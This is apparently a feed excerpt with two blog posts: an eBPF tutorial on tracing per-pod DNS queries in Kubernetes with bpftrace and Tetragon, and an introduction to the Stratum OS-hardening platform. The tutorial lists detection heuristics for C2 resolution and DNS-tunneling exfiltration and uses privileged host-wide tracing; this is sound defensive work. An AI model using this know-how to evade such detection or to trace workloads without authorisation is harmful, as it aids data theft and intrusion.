Reading Time: 9 minutes

eBPF: From Kernel to Cloud, Episode 11
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF · bpftrace · Network Flow Observability · DNS Observability

TL;DR

DNS observability in Kubernetes with eBPF hooks the kernel’s DNS syscall path — giving you per-pod query visibility without sidecars, restarts, or CoreDNS log scraping
(tracepoint = a stable, versioned hook placed deliberately in the Linux kernel source; unlike kprobes, tracepoints survive kernel upgrades without breakage)
CoreDNS metrics tell you aggregate query rates; eBPF tracepoints tell you which pod queried what domain, when, and what was returned
A compromised workload’s first observable action is almost always an unexpected DNS query — infrastructure no legitimate process should ever resolve
The DNS syscall path in Linux goes: application calls getaddrinfo() → glibc → sendto() syscall → kernel network stack → UDP packet to CoreDNS resolver
You hook the sendto tracepoint to catch the query leaving the pod and the recvfrom tracepoint to catch the response arriving
Production note: the buffer passed to sendto() is the DNS message in raw wire format (the kernel adds the UDP header later), so decoding the queried name in a bpftrace one-liner means walking the 12-byte DNS header and the length-prefixed labels; Tetragon and Pixie do this parsing in the eBPF program itself

EP10 showed eBPF flow telemetry as the ground truth for what connections your pods are making. DNS observability with eBPF goes one layer beneath that: the name resolution step that happens before any connection is established. Every domain a pod resolves is visible at the kernel level. That visibility is what a security scan alert is missing when it flags “unexpected DNS queries” — it can see the traffic on the wire, but it can’t tell you which pod sent it without restarting or deploying an agent into the pod.

Quick Check: What DNS Traffic Is Leaving Your Pods Right Now?

Without installing anything, you can see DNS queries crossing any node in under 30 seconds:

# SSH into a worker node, then:

# Watch all UDP port 53 traffic — which processes are making DNS queries?
bpftrace -e '
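tracepoint:syscalls:sys_enter_sendto {
    // sin_port sits at bytes 2-3 of sockaddr_in, in network (big-endian) byte order
    $port = (uint16)((uint8*)args->addr)[2] << 8 |
            (uint16)((uint8*)args->addr)[3];
    if ($port == 53) {
        printf("%-20s %-6d DNS query (UDP sendto)\n", comm, pid);
    }
}
interval:s:30 { exit(); }   // stop after 30 seconds
'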

Expected output:

coredns              1842   DNS query (UDP sendto)   # ← CoreDNS forwarding upstream
nginx                9231   DNS query (UDP sendto)   # ← nginx resolving upstream
payment-svc          11043  DNS query (UDP sendto)   # ← your service making queries
curl                 14829  DNS query (UDP sendto)   # ← kubectl exec / debug session
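The port check depends on the byte layout of struct sockaddr_in: two bytes of address family, then the port in network (big-endian) byte order, then the IPv4 address. A small sketch makes the layout concrete. The helper names are invented, and 10.96.0.10 is just the example resolver address used elsewhere in this post.

```python
import socket
import struct


def pack_sockaddr_in(ip: str, port: int) -> bytes:
    """Build the 16-byte struct sockaddr_in that sendto() receives."""
    family = struct.pack("=H", socket.AF_INET)  # host byte order
    port_be = struct.pack("!H", port)           # network byte order
    return family + port_be + socket.inet_aton(ip) + bytes(8)


def port_from_sockaddr(raw: bytes) -> int:
    """High byte is at offset 2, low byte at offset 3."""
    return (raw[2] << 8) | raw[3]


def byte_swapped_port(raw: bytes) -> int:
    """What you get if the two port bytes are combined in the wrong order."""
    return (raw[3] << 8) | raw[2]


if __name__ == "__main__":
    raw = pack_sockaddr_in("10.96.0.10", 53)
    print(raw.hex())
    print(port_from_sockaddr(raw), byte_swapped_port(raw))
```

Combining the bytes in the wrong order turns port 53 into 13568, so a filter written that way silently matches nothing.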

# How many DNS queries per process in the last 30 seconds?
bpftrace -e '
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args->addr)[2] << 8 |
            (uint16)((uint8*)args->addr)[3];
    if ($port == 53) { @dns_queries[comm] = count(); }
}
interval:s:30 { print(@dns_queries); exit(); }
'

Expected output:

@dns_queries[coredns]:       1203   # ← upstream forwarder traffic
@dns_queries[payment-svc]:    847   # ← legitimate service queries
@dns_queries[unknown]:         12   # ← investigate this one

On EKS or GKE managed nodes: You may not be able to SSH directly to worker nodes, but you can run a privileged debug pod: kubectl debug node/$NODE_NAME -it --image=quay.io/iovisor/bpftrace. The bpftrace program runs on the host kernel and sees all pods’ DNS queries. GKE Autopilot restricts privileged pods, so use GKE’s built-in eBPF-based DNS observability instead (enabled via Cloud Logging with DNS policy logging).

A security scan flagged unexpected DNS queries from payment-svc in the production namespace. The query domains didn’t match anything in the service’s known dependency list. The scan tool showed the traffic on the wire — destination port 53, from the pod’s IP — but couldn’t tell us which process inside the pod was responsible or what domain was being queried without pulling the pod’s DNS logs.

The pod had no DNS logging enabled. CoreDNS showed the queries in its aggregate metrics but with no attribution below namespace level. Restarting the pod to add a DNS sidecar would wipe any in-memory state the process had accumulated.

I ran bpftrace with a recvfrom hook to see which processes were receiving data back into the pod (the candidate DNS responses):

bpftrace -e '
tracepoint:syscalls:sys_exit_recvfrom {
    // tracepoints expose the return value as args->ret (retval is for kretprobes)
    if (args->ret > 0) {
        printf("%-20s PID %-6d received %d bytes (possible DNS response)\n",
               comm, pid, args->ret);
    }
}
interval:s:60 { exit(); }'

Then I cross-referenced the PIDs to container processes via /proc/<PID>/cgroup. The unexpected queries were coming from a sidecar process that had been injected by a recent Helm chart change — not from the main application container at all. A misconfigured Datadog agent injected into the wrong namespace was querying its intake endpoint.

No restart. No sidecar deployment. Found in under two minutes.

Why CoreDNS Metrics Don’t Give You This

CoreDNS exposes DNS query metrics via Prometheus. Those metrics tell you:
– Total queries per second across the cluster
– Query latency histograms
– Error rates (NXDOMAIN, SERVFAIL)
– Upstream forwarder health

What they don’t tell you:
– Which specific pod sent a query to a specific domain
– Which process inside that pod made the getaddrinfo() call
– Whether the query came from the main container or an injected sidecar
– The timing relationship between a DNS query and the connection that followed it

CoreDNS sees the query after it arrives at the resolver. eBPF tracepoints see the query at the moment the pod’s process issues the sendto() syscall — before it leaves the node. The difference is attribution.

The DNS Syscall Path in Linux

Understanding where the hook fires helps you reason about what you can observe:

Application code
    ↓
getaddrinfo("api.example.com") ← glibc resolver function
    ↓
glibc reads /etc/resolv.conf → finds nameserver 10.96.0.10 (CoreDNS ClusterIP)
    ↓
glibc builds DNS wire-format query packet
    ↓
sendto(sockfd, buf, len, 0, &resolver_addr, addrlen)
    ↓                     ← eBPF tracepoint fires here: sys_enter_sendto
Linux kernel: udp_sendmsg()
    ↓
Packet leaves pod veth interface
    ↓
TC eBPF on veth sees UDP packet (flow telemetry picks this up too)
    ↓
CoreDNS receives query, resolves, sends response
    ↓
Packet arrives back at pod veth
    ↓
recvfrom(sockfd, buf, len, 0, &src_addr, &src_len)
    ↓                     ← eBPF tracepoint fires here: sys_exit_recvfrom
glibc parses DNS response
    ↓
getaddrinfo() returns IP addresses to application

getaddrinfo — the standard POSIX function applications call to resolve a hostname to IP addresses. It lives in glibc, not in the kernel. The kernel never sees the domain name string directly — it only sees the UDP packet carrying the DNS wire-format query. To read the actual domain name in an eBPF program, you parse the DNS packet payload at the sendto tracepoint.

tracepoint — a stable, versioned hook deliberately placed in Linux kernel source code by kernel developers. Unlike kprobes (which attach to arbitrary kernel functions and break when those functions change), tracepoints are part of the kernel’s stable interface. The syscall tracepoints predate eBPF itself, and eBPF programs have been able to attach to tracepoints since kernel 4.7. You can rely on syscalls:sys_enter_sendto across Ubuntu 20.04 through the latest kernels without version checks.

Reading DNS Queries at the Tracepoint

The sendto tracepoint fires when any process sends data on a socket. Filtering to port 53 gives you DNS queries. Parsing the payload gives you the domain name.

The DNS wire format for a query:

Bytes 0-11:   DNS header (12 bytes)
              - Transaction ID (2 bytes)
              - Flags (2 bytes)
              - QDCount, ANCount, NSCount, ARCount (2 bytes each)
Byte 12+:     Question section
              - QNAME (variable length, label-encoded)
              - QTYPE (2 bytes)
              - QCLASS (2 bytes)

The QNAME is length-prefixed labels: \x03api\x07example\x03com\x00 for api.example.com. bpftrace can read the raw bytes but parsing label encoding inline in a one-liner is awkward. For raw query detection (flag any DNS query from a specific process), the tracepoint is enough:

# Watch DNS queries from a specific process name (replace "payment-svc")
bpftrace -e '
tracepoint:syscalls:sys_enter_sendto /comm == "payment-svc"/ {
    $port = (uint16)((uint8*)args->addr)[2] << 8 |
            (uint16)((uint8*)args->addr)[3];
    if ($port == 53) {
        printf("PID %-6d sending %d bytes to DNS\n", pid, args->len);
    }
}
'
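As a userspace illustration of the label encoding described above, here is a minimal Python sketch that pulls the QNAME, QTYPE, and QCLASS out of a raw DNS query payload. The function name parse_dns_question is hypothetical, and the sketch assumes a well-formed query with a single uncompressed question. It is not how Tetragon or Pixie implement their parsing.

```python
import struct


def parse_dns_question(payload: bytes) -> dict:
    """Decode the first question of a DNS query in wire format."""
    if len(payload) < 12:
        raise ValueError("shorter than the 12-byte DNS header")
    # Header: transaction ID, flags, QDCOUNT (all big-endian 16-bit fields).
    txid, _flags, qdcount = struct.unpack_from("!HHH", payload, 0)
    if qdcount < 1:
        raise ValueError("no question section")

    labels = []
    offset = 12  # the question section starts right after the header
    while True:
        if offset >= len(payload):
            raise ValueError("truncated QNAME")
        length = payload[offset]
        offset += 1
        if length == 0:  # the zero-length root label terminates the name
            break
        if length & 0xC0:  # top bits set: compression pointer or reserved type
            raise ValueError("compressed or reserved label not handled")
        if offset + length > len(payload):
            raise ValueError("truncated label")
        labels.append(payload[offset:offset + length].decode("ascii", "replace"))
        offset += length

    if offset + 4 > len(payload):
        raise ValueError("truncated QTYPE/QCLASS")
    qtype, qclass = struct.unpack_from("!HH", payload, offset)
    return {"id": txid, "qname": ".".join(labels), "qtype": qtype, "qclass": qclass}


if __name__ == "__main__":
    header = struct.pack("!HHHHHH", 0x1234, 0x0100, 1, 0, 0, 0)
    question = b"\x03api\x07example\x03com\x00" + struct.pack("!HH", 1, 1)
    print(parse_dns_question(header + question))
```

The loop is the part that is awkward to express in a bpftrace one-liner: each label length decides where the next one starts, so the number of iterations is not known up front.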

For full domain name extraction, use a tool that implements DNS wire-format parsing in its eBPF layer. Tetragon and Pixie both do this. On a Tetragon-instrumented cluster:

# Watch DNS queries with domain names — Tetragon (all pods)
kubectl exec -n kube-system -it $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -- tetra getevents --event-types PROCESS_KPROBE \
  | grep -i dns

Sample Tetragon output:

{
  "process": {
    "pod": {"name": "payment-svc-7d4b9f-xk2p1", "namespace": "production"},
    "binary": "/usr/bin/payment-service",
    "pid": 11043
  },
  "function_name": "__sys_sendto",
  "args": [
    {"sock_arg": {"family": "AF_INET", "protocol": "UDP",
                  "daddr": "10.96.0.10", "dport": 53}},
    {"bytes_arg": ""}
  ]
}

Pod name, namespace, binary, PID, and the query payload that carries the domain (bytes_arg), all from a kernel hook (a kprobe on __sys_sendto in this sample): no sidecar, no pod restart.

Building Pod-Level DNS Attribution Without Tetragon

If you’re not running Tetragon, you can build pod-level attribution from the PID. When bpftrace reports a PID making a DNS query, map it to a container:

# Get the PID from bpftrace, then:
PID=11043

# Which cgroup does this PID belong to? (maps to container/pod)
grep kubepods /proc/$PID/cgroup
# 12:cpu:/kubepods/burstable/pod3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12/a4c8f1e2b3d4...
# The pod UID is embedded: pod3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12
# (with the systemd cgroup driver the path uses .slice units and underscores in the UID)

# Map pod UID to pod name
kubectl get pods -A -o jsonpath='{range .items[*]}{.metadata.uid}{" "}{.metadata.name}{" "}{.metadata.namespace}{"\n"}{end}' \
  | grep 3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12
# 3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12  payment-svc-7d4b9f-xk2p1  production

That’s the full chain: kernel tracepoint → host PID → cgroup path → pod UID → pod name + namespace. Automatable. No agents required inside the pod.
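The cgroup-to-pod-UID step of that chain can be sketched in Python as follows. This is a minimal example, not part of any tool mentioned here: the function names are hypothetical, and it assumes the pod UID appears as pod<uid> in the cgroup path, with dashes (cgroupfs driver) or underscores (systemd driver).

```python
import re
from typing import Optional

# "pod" followed by a UUID whose groups are separated by "-" or "_".
_POD_UID = re.compile(r"pod([0-9a-f]{8}(?:[-_][0-9a-f]{4}){3}[-_][0-9a-f]{12})")


def pod_uid_from_cgroup(cgroup_text: str) -> Optional[str]:
    """Return the pod UID found in /proc/<PID>/cgroup content, or None."""
    for line in cgroup_text.splitlines():
        if "kubepods" not in line:
            continue
        match = _POD_UID.search(line)
        if match:
            # Normalise the systemd-style underscores back to dashes.
            return match.group(1).replace("_", "-")
    return None


def pod_uid_for_pid(pid: int) -> Optional[str]:
    """Read the cgroup file of a host PID and extract the pod UID."""
    with open(f"/proc/{pid}/cgroup", encoding="ascii") as handle:
        return pod_uid_from_cgroup(handle.read())


if __name__ == "__main__":
    sample = "12:cpu:/kubepods/burstable/pod3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12/a4c8f1e2b3d4"
    print(pod_uid_from_cgroup(sample))
```

The returned UID is what you would then match against .metadata.uid in the kubectl output.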

Detecting Anomalous DNS: What to Watch For

DNS is the first observable action in most attack chains. A process that has been compromised or injected typically cannot establish a C2 connection without first resolving the C2 domain.

Signals worth watching at the kernel DNS layer:

Queries to non-cluster domains from unexpected processes

# List every process sending to port 53. The hook does not decode the domain,
# so compare the process names against those expected to resolve external names.
bpftrace -e '
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args->addr)[2] << 8 |
            (uint16)((uint8*)args->addr)[3];
    if ($port == 53) {
        printf("%-20s %-6d DNS sendto\n", comm, pid);
    }
}
interval:s:60 { exit(); }'

High-frequency DNS queries from a single process (DNS tunneling fingerprint)

# Processes making more than N DNS queries per second
bpftrace -e '
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args->addr)[2] << 8 |
            (uint16)((uint8*)args->addr)[3];
    if ($port == 53) { @[pid, comm] = count(); }
}
interval:s:1 {
    print(@);
    clear(@);
}
'

DNS tunneling exfiltrates data by encoding it in subdomains of queries. A process making 50+ DNS queries per second to varied subdomains of the same parent domain is a strong signal. CoreDNS aggregate metrics will show elevated query volume; the kernel tracepoint tells you which PID is responsible.
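To turn the per-second counts into a signal, you could post-process each printed snapshot. The sketch below is a hedged Python example: it assumes bpftrace prints a (pid, comm) keyed map as lines of the form @[11043, payment-svc]: 62, and the function name flag_high_rate and the default threshold of 50 are illustrative choices taken from the figure mentioned above.

```python
import re

# Assumed line shape for a map keyed by (pid, comm): "@[<pid>, <comm>]: <count>"
_LINE = re.compile(r"^@\[(\d+), (.+)\]: (\d+)$")


def flag_high_rate(snapshot: str, threshold: int = 50):
    """Return (pid, comm, count) tuples at or above threshold, busiest first."""
    flagged = []
    for line in snapshot.splitlines():
        match = _LINE.match(line.strip())
        if not match:
            continue  # skip blank lines and anything that is not a map entry
        pid, comm, count = int(match.group(1)), match.group(2), int(match.group(3))
        if count >= threshold:
            flagged.append((pid, comm, count))
    return sorted(flagged, key=lambda row: row[2], reverse=True)


if __name__ == "__main__":
    one_second = "@[1842, coredns]: 40\n@[11043, payment-svc]: 62\n@[14829, curl]: 1\n"
    for pid, comm, count in flag_high_rate(one_second):
        print(f"{comm} (PID {pid}): {count} DNS sends in one interval")
```

A single busy second is not proof of tunneling. In practice you would require the threshold to be exceeded over several consecutive intervals before raising an alert.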

Queries immediately followed by a connection (normal vs anomalous pattern)

Legitimate services resolve a known set of domains. A process that resolves a new, never-before-seen domain and immediately opens a TCP connection to the returned IP is structurally different from normal service behavior. The combination of DNS tracepoint + TCP connect kprobe lets you correlate these events by PID and timestamp — without any application instrumentation.
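The correlation by PID and timestamp can be sketched in a few lines of Python once both event streams are collected. Everything here is an illustrative assumption: the Event record, the "dns" and "connect" kind labels, and the one-second window are hypothetical, not output formats of bpftrace or Tetragon.

```python
from dataclasses import dataclass
from typing import Iterable, List, Tuple


@dataclass(frozen=True)
class Event:
    ts: float   # event time in seconds
    pid: int    # host PID that triggered the hook
    kind: str   # "dns" for a port-53 send, "connect" for a TCP connect


def dns_then_connect(events: Iterable[Event], window: float = 1.0) -> List[Tuple[int, float, float]]:
    """Pair each connect with the latest DNS send by the same PID within window seconds."""
    last_dns = {}  # pid -> timestamp of its most recent DNS send
    pairs = []
    for event in sorted(events, key=lambda e: e.ts):
        if event.kind == "dns":
            last_dns[event.pid] = event.ts
        elif event.kind == "connect":
            dns_ts = last_dns.get(event.pid)
            if dns_ts is not None and event.ts - dns_ts <= window:
                pairs.append((event.pid, dns_ts, event.ts))
    return pairs


if __name__ == "__main__":
    stream = [
        Event(10.0, 11043, "dns"),
        Event(10.2, 11043, "connect"),
        Event(10.3, 9231, "connect"),
    ]
    print(dns_then_connect(stream))
```

Each returned tuple is a candidate "resolve, then connect" sequence. Deciding whether the resolved domain is new still requires the domain string, which needs payload parsing.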

Production Gotchas

DNS payload parsing is not trivial in bpftrace. Reading the domain name from the UDP payload requires byte-level parsing of the DNS wire format inside an eBPF program. bpftrace can read raw bytes with buf(), but the label-encoded domain name format requires a loop that the verifier may reject for complexity reasons. Tools like Tetragon and Pixie implement this parsing in C within their eBPF programs where they have more control over verifier limits. For raw detection (flag DNS queries from unexpected processes), the sendto tracepoint without payload parsing is enough.

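sendto fires for all UDP, not just DNS. Filter on the destination port. The destination address structure is at args->addr, and the port sits in network byte order at bytes 2–3 of the sockaddr_in structure: byte 2 is the high byte and byte 3 the low byte, so port 53 appears as 0x00 0x35. The examples compare against port 53; change that value if you’re on a cluster that uses a non-standard DNS port. One more caveat: a resolver that calls connect() on its UDP socket and then send() passes a NULL address to sendto (or uses sendmmsg), so an address-based port filter misses it. glibc’s stub resolver typically works this way, so if your counts look low, hook connect() on port 53 as well.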
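As a userspace illustration of that byte layout, the following minimal Python sketch decodes the first eight bytes of a sockaddr_in. The function names parse_sockaddr_in and is_dns_destination are hypothetical, and the sketch assumes IPv4 only.

```python
import socket
import struct


def parse_sockaddr_in(raw: bytes):
    """Return (family, port, address) from the start of a struct sockaddr_in."""
    if len(raw) < 8:
        raise ValueError("need at least 8 bytes of sockaddr_in")
    # Bytes 0-1: sin_family, stored in host byte order.
    (family,) = struct.unpack_from("=H", raw, 0)
    # Bytes 2-3: sin_port, stored in network (big-endian) byte order.
    (port,) = struct.unpack_from("!H", raw, 2)
    # Bytes 4-7: sin_addr, the IPv4 address in network byte order.
    address = socket.inet_ntoa(raw[4:8])
    return family, port, address


def is_dns_destination(raw: bytes, dns_port: int = 53) -> bool:
    """True when the sockaddr_in points at an IPv4 destination on dns_port."""
    family, port, _address = parse_sockaddr_in(raw)
    return family == socket.AF_INET and port == dns_port


if __name__ == "__main__":
    sample = (
        struct.pack("=H", socket.AF_INET)
        + struct.pack("!H", 53)
        + socket.inet_aton("10.96.0.10")
        + bytes(8)  # sin_zero padding
    )
    print(parse_sockaddr_in(sample), is_dns_destination(sample))
```

Reading the two port bytes in the opposite order turns 53 into 13568, which is why a byte-order slip in the filter silently matches nothing.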

CoreDNS pods will appear in your DNS query trace — that’s expected. CoreDNS makes upstream DNS queries to resolve non-cluster domains. Filter on namespace/cgroup if you want to exclude CoreDNS from your trace.

DNS over TCP is a separate code path. Most DNS queries are UDP. Large responses (>512 bytes) or DNSSEC responses may trigger TCP fallback. The sendto tracepoint catches UDP; for TCP DNS, you’d need tcp_sendmsg with port 53 filtering. In practice, within-cluster DNS resolution is almost entirely UDP.

Caching means not every getaddrinfo() generates a DNS query. glibc’s stub resolver does not cache answers on its own, but a local cache such as nscd or a runtime-level cache (the JVM’s address cache, for example) can answer repeat lookups without any sendto(). A service that resolves api.example.com every 100ms through such a cache may only generate a DNS query every 30 seconds, when the cached entry expires. If you’re looking for which pods are resolving a domain and see only occasional tracepoint hits, that’s expected — it’s the cache miss rate, not the access rate.

Quick Reference

What you want	Command
All DNS queries on a node	`bpftrace -e 'tracepoint:syscalls:sys_enter_sendto { if (port == 53) ... }'`
DNS query count per process	`bpftrace -e '... { @[comm] = count(); }'`
DNS queries from a specific process	`bpftrace -e '... /comm == "my-svc"/ { ... }'`
Map PID to pod	`cat /proc/<PID>/cgroup` → extract pod UID → `kubectl get pods`
DNS events with domain names (Tetragon)	`tetra getevents --event-types PROCESS_KPROBE`
DNS policy violations (Cilium)	`hubble observe --verdict DROPPED --protocol DNS`
CoreDNS query logs	`kubectl logs -n kube-system -l k8s-app=kube-dns`

DNS signal	What it indicates
New domain, immediate TCP connect	Possible C2 resolution
50+ queries/second from one PID	DNS tunneling candidate
Query to non-cluster domain from batch job	Unusual — investigate
NXDOMAIN responses at high rate	Misconfiguration or DGA
Queries from PID not matching any known binary	Injected process

Key Takeaways

DNS observability in Kubernetes with eBPF uses the sendto tracepoint — the hook fires when the process issues the syscall, before the packet leaves the node, giving you PID-level attribution with no sidecar
CoreDNS metrics show aggregate DNS health; kernel tracepoints show which pod and which process made each query — the attribution gap between the two is where anomaly detection lives
The DNS syscall path goes: getaddrinfo() → glibc → sendto() syscall → kernel UDP stack → CoreDNS. eBPF hooks fire at the sendto() boundary
A compromised workload’s first observable action is almost always a DNS query; tracepoint-based DNS observability catches it at the kernel level, ahead of any application log
Caches between the application and the socket (nscd, runtime-level caches) answer repeat lookups, so tracepoint hit rate reflects cache misses, not getaddrinfo() call rate — account for this when baselining
Full domain name extraction requires DNS wire-format parsing; Tetragon and Pixie do this in their eBPF programs; bpftrace one-liners detect the query event without the domain string

What’s Next

DNS observability tells you what a workload is resolving. EP12 answers what happens when you want to stop a workload from doing something — not detect it after the fact, but prevent it at the syscall boundary before it completes.

LSM hooks and Tetragon’s kill path enforce at the kernel level. When the kernel enforces, the process never gets the return value from the syscall. There is no “detect and respond” window — the action simply does not complete. That is a structurally different security posture from anything a sidecar or userspace agent can provide.

Next: LSM and Tetragon — when the kernel says no

Get EP12 in your inbox when it publishes → linuxcent.com/subscribe

The post DNS at the Kernel Level — What Your Pods Are Actually Resolving appeared first on Linuxcent.

Stratum — OS Hardening as a Platform

Vamshi Krishna Santhapuri — Sun, 31 May 2026 02:00:00 +0000

Reading Time: 5 minutes

OS Hardening as Code, Episode 6
Cloud AMI Security Risks · Linux Hardening as Code · Multi-Cloud OS Hardening · Automated OpenSCAP Compliance · CI/CD Compliance Gate · Stratum Platform

TL;DR

Stratum is open-source under Apache 2.0 — the engine, blueprint format, scanner, and Pipeline API are all available on GitHub
The platform follows the same open-core model as Terraform/OpenTofu and Cilium/Isovalent: OSS core, self-hostable, extendable
Three extension points: custom compliance controls, provider plugins (add new cloud providers), pipeline integrations
Architecture: Blueprint YAML → Engine → Provider Layer → Ansible-Lockdown → OpenSCAP → Golden Image → Pipeline API
The series taught the user-facing interface for five episodes; EP06 covers what’s underneath and how to build on it
Installation is a single helm install or docker compose up — the platform runs in your environment

The Series Arc, Inverted

EP01 showed that default cloud AMIs arrive pre-broken. By the time you reach EP06, that problem has a complete solution:

EP01 — The problem:
  Default AMI → Production → Security audit finds gaps
  (unknown OS baseline, unverified hardening, no evidence)

EP06 — The solution:
  HardeningBlueprint YAML
           ↓
    stratum build          ← EP02 (blueprint as code)
    --provider aws,gcp     ← EP03 (multi-cloud)
           ↓
    OpenSCAP scan          ← EP04 (compliance grading)
    Grade: A (94/100)
           ↓
    POST /api/pipeline/scan ← EP05 (CI/CD gate)
    Result: pass
           ↓
    Production deployment
    (Grade A, SARIF attached, blueprint version-controlled)

For five episodes, you’ve used Stratum as a user. This episode covers what it looks like to run it yourself, extend it, and build on it.

I’ve spent years watching infrastructure teams solve the same OS hardening problem in slightly different ways. Custom scripts that drift. OpenSCAP runs that produce evidence no one reads. Compliance checklists completed by humans who have competing priorities.

The tools exist. ansible-lockdown applies CIS controls reliably. OpenSCAP verifies them accurately. The CI/CD systems can enforce anything you can express as a pass/fail. The gap isn’t the tooling — it’s the integration layer that ties them together into a reproducible, auditable pipeline.

Stratum is that integration layer, open-sourced.

The philosophy is the same as Terraform applied to OS security posture: declare the desired state in a version-controlled file, apply it reproducibly, and verify it automatically. The skip-at-2am problem disappears not because engineers are more careful, but because there’s no step to skip.

The Architecture

┌─────────────────────────────────────────────────────────┐
│                 HardeningBlueprint YAML                  │
│         (version-controlled, provider-agnostic)          │
└─────────────────────┬───────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────────────────┐
│                   Stratum Engine                         │
│                  (Apache 2.0, OSS)                       │
│  ┌─────────────┐  ┌──────────────┐  ┌────────────────┐  │
│  │  Blueprint  │  │   Provider   │  │    Scheduler   │  │
│  │   Parser    │  │    Layer     │  │  (parallel     │  │
│  │             │  │  AWS  GCP    │  │   multi-cloud  │  │
│  │  Validates  │  │  Azure DO    │  │   builds)      │  │
│  │  schema +   │  │  Linode      │  │                │  │
│  │  overrides  │  │  Proxmox     │  │                │  │
│  └─────────────┘  └──────────────┘  └────────────────┘  │
└─────────────────────┬───────────────────────────────────┘
                      │
           ┌──────────┴──────────┐
           ▼                     ▼
  ┌─────────────────┐   ┌─────────────────┐
  │ Ansible-Lockdown │   │  OpenSCAP       │
  │  Runner          │   │  Scanner        │
  │                  │   │                 │
  │  UBUNTU22-CIS    │   │  A-F grade      │
  │  RHEL8-STIG      │   │  SARIF export   │
  │  Custom roles    │   │  Drift detect   │
  └────────┬─────────┘   └────────┬────────┘
           │                      │
           └──────────┬───────────┘
                      │
                      ▼
         ┌─────────────────────────┐
         │   Golden Image          │
         │   (AMI / GCP / Azure)   │
         │   + compliance metadata │
         └────────────┬────────────┘
                      │
                      ▼
         ┌─────────────────────────┐
         │   Pipeline API          │
         │   (Apache 2.0, OSS)     │
         │                         │
         │  POST /api/pipeline/scan │
         │  ← CI/CD gate           │
         └─────────────────────────┘

Every component is open-source under Apache 2.0. The engine, provider layer, Ansible runner, OpenSCAP scanner, and Pipeline API are all in the repository. Nothing is locked to a hosted service.

Installation

Stratum runs as a set of containers. Kubernetes or Docker Compose both work.

Kubernetes (Helm):

# Clone the repository
git clone https://github.com/rrskris/Stratum
cd Stratum

# Install Stratum in your cluster using the bundled Helm chart
helm install stratum ./deploy/helm/stratum \
  --namespace stratum-system \
  --create-namespace \
  --set config.providers.aws.enabled=true \
  --set config.providers.gcp.enabled=true \
  --set config.storageClass=standard

# Verify
kubectl get pods -n stratum-system
# NAME                          READY   STATUS    RESTARTS   AGE
# stratum-engine-0              1/1     Running   0          2m
# stratum-scanner-7d9b4-abc12   1/1     Running   0          2m
# stratum-api-6c8f5-def34       1/1     Running   0          2m

Docker Compose (single-node):

# Clone the repository
git clone https://github.com/rrskris/Stratum
cd Stratum

# Configure providers
cp config/providers.example.yaml config/providers.yaml
vim config/providers.yaml  # add AWS/GCP/Azure credentials

# Start
docker compose up -d

# Stratum is available at http://localhost:8080

The Three Extension Points

1. Custom Compliance Controls

Add controls that aren’t in the CIS benchmark — internal policies, org-specific security requirements, or controls from other frameworks:

# controls/custom-audit-policy.yaml
id: CUSTOM-001
title: Audit logging retention must be 90 days
description: All instances must retain audit logs for 90 days minimum; auditd must keep rotated logs rather than delete them
severity: high
benchmark: custom
check:
  type: command
  command: "grep -E '^max_log_file_action' /etc/audit/auditd.conf"
  expected: "max_log_file_action = keep_logs"
remediation:
  type: ansible
  task: |
    - name: Configure audit log retention
      lineinfile:
        path: /etc/audit/auditd.conf
        regexp: '^max_log_file_action'
        line: 'max_log_file_action = keep_logs'

Deploy the custom control:

stratum controls deploy --file controls/custom-audit-policy.yaml

Reference it in any blueprint:

compliance:
  benchmark: cis-l1
  controls: all
  additional_controls:
    - CUSTOM-001

Custom controls appear in the grade calculation and SARIF output alongside CIS controls.

2. Provider Plugins

Add support for a new cloud provider by implementing the provider interface:

# providers/custom_provider.py
from stratum.providers import BaseProvider

class CustomProvider(BaseProvider):
    name = "my-cloud"

    def provision_build_instance(self, blueprint, config):
        # Launch a build instance on your cloud
        # Return: instance_id, connection_details
        ...

    def create_image(self, instance_id, blueprint, grade):
        # Snapshot the instance into an image
        # Tag with compliance metadata
        # Return: image_id
        ...

    def terminate_instance(self, instance_id):
        # Clean up the build instance
        ...

Register the provider:

stratum providers register --file providers/custom_provider.py --name my-cloud

The provider is now available as --provider my-cloud in all stratum build commands.

3. Pipeline Integrations

Beyond the curl-based API, Stratum provides a webhook system that fires on build completion, scan results, and gate failures:

# Webhook configuration
notifications:
  - event: pipeline_gate_failure
    webhook: https://hooks.slack.com/...
    template: |
      Image {{ image_id }} failed compliance gate.
      Grade: {{ grade }} (required: {{ min_grade }})
      Top failing controls:
      {% for control in failing_controls[:3] %}
      - {{ control.id }}: {{ control.title }}
      {% endfor %}

  - event: build_complete
    webhook: https://jira.yourdomain.com/api/...
    template: |
      New image built: {{ image_id }}
      Blueprint: {{ blueprint_name }}@{{ blueprint_version }}
      Grade: {{ grade }}

The Open-Core Model

Stratum follows the same model as the tools that have become infrastructure standards:

Tool	Open-core model
Terraform / OpenTofu	Core OSS, enterprise features in paid tier
Cilium / Isovalent	Core OSS, enterprise support/features in paid tier
Vault / HCP Vault	Core OSS, hosted/enterprise in paid tier
Stratum	Engine + blueprint + scanner + Pipeline API: Apache 2.0

Everything taught in this series — the blueprint format, the build pipeline, the compliance grading, the CI/CD gate — is in the OSS core. You can self-host it, extend it, contribute to it, and run it in your own infrastructure without any dependency on a hosted service.

The repository is at: github.com/rrskris/Stratum

What This Series Taught

EP01 — EP06 in one view:

Episode	What you learned	What Stratum does
EP01	Default AMIs are insecure by design	Replaces default AMI with a hardened golden image
EP02	Blueprint as code — the 2am skip disappears	HardeningBlueprint YAML — 5-step wizard or direct YAML
EP03	One blueprint, six providers, no drift	6 providers: AWS, GCP, Azure, DigitalOcean, Linode, Proxmox
EP04	Automated OpenSCAP — grade at build time	Compliance Scanner: A-F, SARIF, drift detection
EP05	CI/CD gate — the unhardened image never deploys	Pipeline API: `POST /api/pipeline/scan`
EP06	The platform — OSS, self-hostable, extendable	Apache 2.0, Helm install, three extension points

What’s Next

